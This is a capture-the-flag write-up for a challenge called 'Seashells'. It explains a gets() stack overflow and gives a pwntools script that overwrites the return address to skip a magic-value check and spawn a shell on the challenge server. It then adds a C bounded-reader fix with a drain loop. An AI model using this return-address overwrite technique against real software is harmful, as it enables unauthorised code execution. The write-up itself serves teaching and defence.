# Seashells

There is a function called "shell". This function loads rdi into rbp-8, checks it against the value `0xdeadcafebabebeef`, and if the check is successful it pops a shell for us.\
Clearly, our goal is to call this function.

In main, there is a gets call. It reads as much input as we want into `rbp-0xa`, opening up an avenue for buffer overflow. As the saved rbp is 8 bytes long, our padding will be 0xa + 8 bytes of junk.

We *could* use a pop rdi gadget so that the check works properly, but there's no need. Instead, we can jump straight to the instruction inside of shell that pops a shell for us.

So our payload is just padding + the address of the instruction inside shell that pops a shell.

```python
from pwn import *

# the buffer sits at rbp-0xa; the saved rbp (8 bytes) follows it, then the return address
NUM_TO_RET = 0xa + 8
padding = b'A' * NUM_TO_RET
# overwrite the return address with the instruction inside shell that spawns the shell,
# skipping the 0xdeadcafebabebeef comparison entirely
payload = flat(padding, 0x4006e3, word_size=64)

p = remote('p1.tjctf.org', 8009)
p.recvlines(2)   # consume the banner lines before sending
pause()          # convenient point to attach a debugger
p.sendline(payload)
p.interactive()
```
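The root cause above is `gets` writing past a 0xa-byte stack buffer. As an added example (not part of the original writeup or the challenge binary), the bounded reader below shows the fix a defender would make: read at most `buf_len - 1` bytes, strip the newline, and drain the rest of an over-long line so it cannot leak into the next read. `BUF_LEN`, the helper names and the in-memory inputs are assumptions constructed for the demo; `fmemopen` is POSIX.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Same size as the 0xa-byte buffer in the writeup (assumed value for the demo). */
#define BUF_LEN 10

/* Bounded replacement for gets(): reads at most buf_len-1 bytes into buf, strips the
 * trailing newline, and discards the remainder of an over-long line so it cannot spill
 * into the next read. Returns 1 if the whole line fit, 0 if it was truncated, -1 on EOF
 * with no data. The buffer can never be overrun, whatever the input length. */
int read_line_bounded(FILE *in, char *buf, size_t buf_len) {
    if (buf_len == 0 || fgets(buf, (int)buf_len, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    /* No newline seen: either the line ended exactly at EOF or it was too long. Drain. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated ? 0 : 1;
}

/* Demo helpers over constructed in-memory input. */
static char line_buf[BUF_LEN];

/* Reads one line from a constructed string; returns the reader status.
 * The text that was stored is available via last_line(). */
int read_from_string(const char *input) {
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -2;
    int status = read_line_bounded(in, line_buf, BUF_LEN);
    fclose(in);
    return status;
}

const char *last_line(void) { return line_buf; }

/* Feeds a constructed over-long first line (well past the 0x12 bytes that separate the
 * buffer from the return address) followed by "hello". Returns 1 when the first read
 * reports truncation, stores only BUF_LEN-1 bytes, and the second read still yields
 * "hello" intact, i.e. the excess was drained rather than written anywhere. */
int demo_overlong_then_next(void) {
    const char *input =
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nhello\n";
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -2;
    char first[BUF_LEN], second[BUF_LEN];
    int s1 = read_line_bounded(in, first, BUF_LEN);
    int s2 = read_line_bounded(in, second, BUF_LEN);
    fclose(in);
    return s1 == 0 && strlen(first) == BUF_LEN - 1 && s2 == 1 && strcmp(second, "hello") == 0;
}

/* Stand-alone use: read one line from stdin with the bounded reader. */
int main(void) {
    char buf[BUF_LEN];
    buf[0] = '\0';
    int status = read_line_bounded(stdin, buf, BUF_LEN);
    printf("status=%d line=\"%s\"\n", status, buf);
    return 0;
}
```

The drain loop matters: with plain `fgets` and no drain, the leftover bytes of a long line are returned by the next read, which is a common source of state confusion in line-oriented services even after the overflow itself is gone.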

